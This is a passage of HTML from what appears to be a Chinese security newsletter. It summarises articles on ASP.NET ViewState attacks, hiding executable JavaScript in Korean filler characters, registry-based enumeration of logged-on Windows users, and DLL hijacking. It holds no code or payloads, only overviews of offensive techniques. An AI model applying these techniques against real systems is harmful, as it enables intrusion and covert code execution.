		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmq9olbYbLBTq8AYY0qtCp6zkr56uQYUl8nPMJtT2rHiapia1aJsSmwJuibJuXVBmkic9iaNkoMncsRvkg/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmq9olbYbLBTq8AYY0qtCp6zkr56uQYUl8nPMJtT2rHiapia1aJsSmwJuibJuXVBmkic9iaNkoMncsRvkg/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=4848581511848258"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">ViewState是ASP.NET中用于保持页面状态的关键机制，但在不当配置下可能会带来安全风险。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">在不同的配置和版本环境下，ViewState的安全性会有显著差异，需要特别注意的是Mac验证和加密的配置。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">攻击者可以通过多种手段来利用ViewState的安全漏洞，包括生成恶意payload、绕过加密和Mac验证等。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">在实战中，攻击者可以采用黑盒测试和白盒审计两种方法来发现和利用ViewState的问题。</section></li></ul>
	<br/>
	<p>🏷️: ViewState, ASP.NET, 安全问题, 渗透测试</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x08
			 利用韩文字母填充字符执行隐形JavaScript</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">该网页介绍了利用韩文字符填充漏洞来执行看不见的JavaScript代码的方法，并且这一方法受到了Martin Kleppe的INVISIBLE.js的启发。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.5222222222222223" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=f6012cff&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmq9olbYbLBTq8AYY0qtCp60KZhNrea2Qthm80qHWAiaIysgwSyc2YAuYBjTTtgGsMibM4qsBmX8ogw%2F640%3Ffrom%3Dappmsg"/>
	</section></section>

	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmq9olbYbLBTq8AYY0qtCp6dkZpvsH5r40c18ru6nITJyGOyrYMNPAMeARU57oLx1gzQb5T6HE4Gw/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmq9olbYbLBTq8AYY0qtCp6dkZpvsH5r40c18ru6nITJyGOyrYMNPAMeARU57oLx1gzQb5T6HE4Gw/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=8858281158281252"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">利用韩文字符填充漏洞执行JavaScript代码是一种巧妙的方法，可以在用户看不到代码的情况下执行。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">这种方法受到了Martin Kleppe的INVISIBLE.js的启发，INVISIBLE.js是一个专门用于隐藏JavaScript代码执行的框架。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">通过本文提供的示例代码，可以看到代码执行的过程，以及这种技术的实际应用。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">这种技术可能会有潜在的安全风险和滥用情况，因为它允许在用户不知情的情况下执行脚本。</section></li></ul>
	<br/>
	<p>🏷️: JavaScript, 隐形代码, 韩文字母, 代码执行</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x09
			 简单脚本从reg.py/lookupsid复制并受itm4n的注册表会话枚举启发</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">该网页提供了一个简单的Python脚本，用于通过注册表检查Windows系统上的登录用户，该脚本灵感来源于itm4n的会话枚举方法。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.5" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=5493b03a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmq9olbYbLBTq8AYY0qtCp6SGNibmqxsWdzNtbneIFfjwT7o2ibazfj8sTYib1XoLfpIInkYKuslm9SQ%2F640%3Ffrom%3Dappmsg"/>
	</section></section>

	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">低权限用户利用注册表进行C#/BOF替代方案</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmq9olbYbLBTq8AYY0qtCp6fvWUhObNFO3THOpTZy5bhfn8gKRlicRYhgqDoPVpd2LOdDKGUkQzicZQ/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmq9olbYbLBTq8AYY0qtCp6fvWUhObNFO3THOpTZy5bhfn8gKRlicRYhgqDoPVpd2LOdDKGUkQzicZQ/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=1525458888222822"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">远程检测Windows登录用户：该脚本的主要目的是远程检测Windows系统上当前登录的用户，这对于安全审计和管理员的日常工作非常有用。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">基于注册表的枚举方法：脚本利用Windows注册表中的HKEY_USERS键来枚举用户的SID，这是一种高效的检测已登录用户的方法。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">集成Kerberos认证：脚本支持Kerberos认证，这使得在支持Kerberos的环境中进行更安全的认证成为可能。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">灵活的命令行参数：用户可以通过命令行参数来指定目标主机的IP地址、端口、认证方式等，提供了很高的灵活性。</section></li></ul>
	<br/>
	<p>🏷️: 脚本, 注册表, 会话枚举, Python</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x0a
			 DLL劫持：恶意代码代理的新视角</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
